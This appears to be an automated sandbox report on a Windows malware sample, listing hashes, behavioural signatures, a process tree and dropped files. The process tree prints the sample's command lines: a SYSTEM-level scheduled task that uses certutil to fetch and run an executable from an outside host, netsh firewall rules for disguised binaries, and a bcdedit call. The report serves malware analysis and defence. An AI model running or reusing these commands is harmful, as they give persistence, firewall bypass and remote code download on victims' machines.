Analysis
- max time kernel: 21s
- max time network: 141s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 24-05-2022 00:41

Static task: static1

Behavioral task: behavioral1
- Sample: 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
- Resource: win7-20220414-en

Behavioral task: behavioral2
- Sample: 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
- Resource: win10v2004-20220414-en
General
- Target: 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
- Size: 3.9MB
- MD5: f0ba0b617c4f6be9bb0091003dd55a18
- SHA1: dcc4ecfc0016ae1a649929f29ae87eaae1fac9a7
- SHA256: 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf
- SHA512: 9ebefffdf4bc6aa73e03dcb105ad327b170dbbb03746e43f4ce59571f19c27b5ee722dfaa7bc384b90cfd44648bb2550c2beb29be71ab649c7564e10cdb9a8ff
Malware Config
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  Processes:
  description | pid | process | target process
  PID 2720 created 2116 | 2720 | svchost.exe | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe

- Modifies Windows Firewall (1 TTPs)

- Modifies boot configuration data using bcdedit (1 IoCs)
  Processes:
  pid | process
  4356 | bcdedit.exe

- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes:
  pid | process
  1964 | schtasks.exe
  4168 | schtasks.exe

- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
  pid | process
  2116 | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
  2116 | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
  2228 | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
  2228 | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe

- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2116 | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
  Token: SeImpersonatePrivilege | 2116 | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
  Token: SeTcbPrivilege | 2720 | svchost.exe
  Token: SeTcbPrivilege | 2720 | svchost.exe

- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes:
  description | pid | process | target process
  PID 2720 wrote to memory of 2228 | 2720 | svchost.exe | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
  PID 2720 wrote to memory of 2228 | 2720 | svchost.exe | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
  PID 2720 wrote to memory of 2228 | 2720 | svchost.exe | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
  PID 2228 wrote to memory of 4372 | 2228 | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe | cmd.exe
  PID 2228 wrote to memory of 4372 | 2228 | 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe | cmd.exe
  PID 4372 wrote to memory of 668 | 4372 | cmd.exe | netsh.exe
  PID 4372 wrote to memory of 668 | 4372 | cmd.exe | netsh.exe
Processes (indentation shows the process tree depth)
- C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe"
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe"
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\netsh.exe
        Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
    - C:\Windows\rss\csrss.exe
      Command line: C:\Windows\rss\csrss.exe ""
      - C:\Windows\SYSTEM32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        Signatures: Creates scheduled task(s)
      - C:\Windows\SYSTEM32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Signatures: Creates scheduled task(s)
      - C:\Windows\system32\bcdedit.exe
        Command line: C:\Windows\Sysnative\bcdedit.exe /v
        Signatures: Modifies boot configuration data using bcdedit
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
- C:\Windows\system32\netsh.exe
  Command line: netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 1.7MB
  MD5: 13aaafe14eb60d6a718230e82c671d57
  SHA1: e039dd924d12f264521b8e689426fb7ca95a0a7b
  SHA256: f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
  SHA512: ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

- C:\Windows\rss\csrss.exe
  Filesize: 2.1MB
  MD5: 8cb4593803c40d617a7d63135506062b
  SHA1: d45d21ca9fa8433f6b0621db7a582e1d86f85d0e
  SHA256: 746a3143a3f79a95d088362ef9e7697418f739b0977ffdca6dc7f33ff2ec3e74
  SHA512: e7ab7741c423ee30e6ad8624f3335e7226b5565a2315a8776cbe3a269a92306747a6a3b8e38ac02c0a87198f796a4f915d053125d17381969249025a1283e200

- C:\Windows\rss\csrss.exe
  Filesize: 2.1MB
  MD5: b700c94525338822f970874d9a780d7c
  SHA1: 77ddc4f07987f7d61c50f4e79b750509fbc42fd4
  SHA256: 3ed0f7c20887eaed1cc5555c7cf14d903d6d84e74d6bf2ce61491be2d872d548
  SHA512: b7f37837f37935b67cfb841c92a291f64a0e1ae6bf71cd2626ce9c564f69aaa421d48ad0874cd1a8c5dc70ebaf7ad9887167096a92f9f5f0b1897fd2e8c1009e
Memory dumps
- memory/668-137-0x0000000000000000-mapping.dmp
- memory/1964-146-0x0000000000000000-mapping.dmp
- memory/2116-131-0x0000000001510000-0x0000000001C05000-memory.dmp (Filesize: 7.0MB)
- memory/2116-132-0x0000000000400000-0x0000000000B10000-memory.dmp (Filesize: 7.1MB)
- memory/2116-130-0x000000000115E000-0x0000000001504000-memory.dmp (Filesize: 3.6MB)
- memory/2228-135-0x0000000000400000-0x0000000000B10000-memory.dmp (Filesize: 7.1MB)
- memory/2228-134-0x0000000001361000-0x0000000001707000-memory.dmp (Filesize: 3.6MB)
- memory/2228-133-0x0000000000000000-mapping.dmp
- memory/2632-138-0x0000000000000000-mapping.dmp
- memory/2780-147-0x0000000000000000-mapping.dmp
- memory/3176-139-0x0000000000000000-mapping.dmp
- memory/4168-145-0x0000000000000000-mapping.dmp
- memory/4356-149-0x0000000000000000-mapping.dmp
- memory/4372-136-0x0000000000000000-mapping.dmp
- memory/4584-140-0x0000000000000000-mapping.dmp
- memory/4584-143-0x0000000001500000-0x00000000018A6000-memory.dmp (Filesize: 3.6MB)
- memory/4584-144-0x0000000000400000-0x0000000000B10000-memory.dmp (Filesize: 7.1MB)